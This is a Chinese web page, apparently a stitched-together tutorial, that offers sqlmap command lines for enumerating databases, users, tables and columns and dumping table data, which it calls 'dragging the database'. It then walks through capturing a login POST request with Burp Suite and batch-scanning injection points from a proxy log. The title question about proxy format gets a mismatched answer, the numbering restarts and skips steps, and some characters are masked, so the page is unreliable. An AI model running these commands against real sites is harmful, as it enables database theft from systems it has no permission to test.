sqlmap工具设置代理以下哪个格式是对的

sqlmap工具设置代理以下从多行文本格式文件读取多个目标是对的。sqlmap是一个开源的渗透测试工具，它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。它有一个强大的检测引擎，许多适合于终极渗透测试的小众特性和广泛的开关，从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在 *** 作系统上执行命令。

1. 基础用法：

./sqlmap.py -u “注入地址” -v 1 –dbs // 列举数据库

./sqlmap.py -u “注入地址” -v 1 –current-db // 当前数据库

./sqlmap.py -u “注入地址” -v 1 –users// 列数据库用户

./sqlmap.py -u “注入地址” -v 1 –current-user // 当前用户

./sqlmap.py -u “注入地址” -v 1 –tables -D “数据库” // 列举数据库的表名

./sqlmap.py -u “注入地址” -v 1 –columns -T “表名” -D “数据库” // 获取表的列名

./sqlmap.py -u “注入地址” -v 1 –dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据，包含列

已经开始拖库了，SQLMAP是非常人性化的，它会将获取的数据存储sqlmap/output/中、、、

2. sqlmap post注入

我们在使用Sqlmap进行post型注入时，

经常会出现请求遗漏导致注入失败的情况。

这里分享一个小技巧，即结合burpsuite来使用sqlmap，

用这种方法进行post注入测试会更准确， *** 作起来也非常容易。

1. 浏览器打开目标地址http:// www.2cto.com /Login.asp

2. 配置burp代理(127.0.0.1:8080)以拦截请求

3. 点击login表单的submit按钮

4. 如下图，这时候Burp会拦截到了我们的登录POST请求

5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下

1.burpsuite配合sqlmap批量扫描注入点，首先设置burp的记录日志，图1。我放在了sqlmap的目录下，在这里叫sqlmap.txt

burpsuite工具和jdk下载地址：点击下载

2.在burp和手机上设置好代理如下图。（须在同一局域网）

4．sqlmap读取日志自动测试：

D:\Python27\sqlmap>sqlmap.py -l sqlmap.txt --batch -smart

Batch:会自动选择yes

Smart:启发式快速判断，节约时间。

window版的sqlmap最后能注入的URL都会保存到C:\Users\Administrator\.sqlmap文件夹下。

---